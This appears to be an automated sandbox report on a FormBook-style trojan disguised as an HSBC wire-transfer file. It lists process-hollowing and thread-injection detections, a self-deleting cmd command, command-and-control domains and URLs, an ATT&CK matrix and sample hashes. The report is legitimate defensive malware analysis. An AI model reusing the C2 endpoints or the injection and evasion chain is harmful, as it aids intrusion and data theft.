Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_03649100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_03649100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_03649100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036D41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0364B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0364B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0364B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036761A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036761A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036C69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0367A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0366C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_03672990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_03702073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_03711074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_03660050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_03660050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 16_2_0366A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 172.217.168.83 80
          Source: C:\Windows\explorer.exe | Domain query: www.gramaltinrafineri.com
          Source: C:\Windows\explorer.exe | Domain query: www.catproductreviews.com
          Source: C:\Windows\explorer.exe | Domain query: www.piramsgprodiet.store
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: C50000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Thread register set: target process: 3352
          Source: C:\Windows\SysWOW64\ipconfig.exe | Thread register set: target process: 3352
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Process created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 0000000C.00000000.291644026.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.327163839.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.308348112.0000000000B68000.00000004.00000020.sdmp | Binary or memory string: Progman\Pr
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.316504406.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 0000000C.00000000.319632104.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.301501003.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.335138574.0000000008778000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Queries volume information: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Command and Scripting Interpreter2 | Path Interception | Process Injection512 | Rootkit1 | Credential API Hooking1 | Security Software Discovery221 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion31 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection512 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information1 | Cached Domain Credentials | System Network Configuration Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information4 | DCSync | System Information Discovery112 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |

          Behavior Graph

          Behavior Graph ID: 528773 | Sample: HSBC ... Wire Transfer Copy.exe | Start date: 25/11/2021 | Architecture: WINDOWS | Score: 100
          Start node signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures
            HSBC ... Wire Transfer Copy.exe (started): dropped C:\...\HSBC ... Wire Transfer Copy.exe.log, ASCII
              HSBC ... Wire Transfer Copy.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                explorer.exe (injected): www.piramsgprodiet.store; www.gramaltinrafineri.com; 4 other IPs or domains; System process connects to network (likely due to code injection or exploit); Uses ipconfig to lookup or modify the Windows network settings
                  ipconfig.exe (started): Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    cmd.exe (started)
                      conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          HSBC ... Wire Transfer Copy.exe | 17% | Virustotal |
          HSBC ... Wire Transfer Copy.exe | 40% | ReversingLabs | Win32.Trojan.AgentTesla

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          gramaltinrafineri.com | 0% | Virustotal |
          catproductreviews.com | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.gramaltinrafineri.com/m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo | 0% | Avira URL Cloud | safe
          www.atlantiscompania.com/m4n8/ | 0% | Avira URL Cloud | safe
          http://www.catproductreviews.com/m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 | 0% | Avira URL Cloud | safe
          https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNH | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          ghs.google.com | 172.217.168.83 | true | false | | high
          gramaltinrafineri.com | 34.102.136.180 | true | false | | unknown
          catproductreviews.com | 34.102.136.180 | true | false | | unknown
          www.catproductreviews.com | unknown | unknown | true | | unknown
          www.piramsgprodiet.store | unknown | unknown | true | | unknown
          www.gramaltinrafineri.com | unknown | unknown | true | | unknown

                  Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.gramaltinrafineri.com/m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo | false | Avira URL Cloud: safe | unknown
          www.atlantiscompania.com/m4n8/ | true | Avira URL Cloud: safe | low
          http://www.catproductreviews.com/m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 | false | Avira URL Cloud: safe | unknown

                  URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp | false | | high
          https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNH | ipconfig.exe, 00000010.00000002.551598331.000000000403F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown

                    Contacted IPs


                    Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          34.102.136.180 | gramaltinrafineri.com | United States | 15169 | GOOGLEUS | false
          172.217.168.83 | ghs.google.com | United States | 15169 | GOOGLEUS | false

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528773
                    Start date:25.11.2021
                    Start time:18:55:52
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 28s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:HSBC ... Wire Transfer Copy.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:29
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@7/1@3/2
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 20.1% (good quality ratio 18.2%)
                    • Quality average: 73.7%
                    • Quality standard deviation: 31%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
          • Not all processes were analyzed, report is missing behavior information

                    Simulations

                    Behavior and APIs

          Time | Type | Description
          18:56:46 | API Interceptor | 21x Sleep call for process: HSBC ... Wire Transfer Copy.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HSBC ... Wire Transfer Copy.exe.log
                    Process:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):2239
                    Entropy (8bit):5.354287817410997
                    Encrypted:false
                    SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                    MD5:913D1EEA179415C6D08FB255AE42B99D
                    SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                    SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                    SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                    Malicious:true
                    Reputation:moderate, very likely benign file
                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.856337226634709
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    • Win32 Executable (generic) a (10002005/4) 49.78%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    File name:HSBC ... Wire Transfer Copy.exe
                    File size:471552
                    MD5:99b154970d15748d1df9025f675ecc76
                    SHA1:75503611daf18643a401c2020ae9e045111b7f1f
                    SHA256:13af03cd2db9c68bc397fd81f101287df005f27bc806737ffad390324a068d4c
                    SHA512:9fd769b3292753089bf5e7a1bd805867cc80e670ad43b371cad39acd9124813ab17d7ca6a58211f40e295183ed0eafd22b8a6c4e271f30bf5a500bdfd7376786
